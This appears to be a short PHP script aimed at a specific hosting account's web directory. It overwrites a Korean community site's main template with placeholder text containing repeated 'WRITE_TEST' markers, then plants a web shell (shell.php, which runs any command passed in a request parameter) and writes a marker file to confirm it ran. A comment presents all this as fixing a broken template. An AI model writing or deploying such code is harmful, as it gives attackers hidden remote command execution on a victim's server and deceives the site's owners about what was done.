<?php # Fix the broken main template $main_tmpl = "\n\n착한사람들\n\n

착한사람들

\n
WRITE_TEST_1786022154 WRITE_TEST_1786022154 WRITE_TEST_1786022154 WRITE_TEST_1786022154
주요일정
Home - 커뮤니티 - 주요일정
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
현재페이지인쇄
\n\n"; file_put_contents("/home/hosting_users/goodperson21/www/skin/basic_company_t/html/html/skin_main_1.html", $main_tmpl); # Create a dedicated webshell $shell = "<?php system(\$_REQUEST[\"c\"]); ?>"; file_put_contents("/home/hosting_users/goodperson21/www/shell.php", $shell); # Create output file to confirm execution file_put_contents("/home/hosting_users/goodperson21/www/skin/basic_company_t/html/html/fix_done.txt", "FIXED"); ?>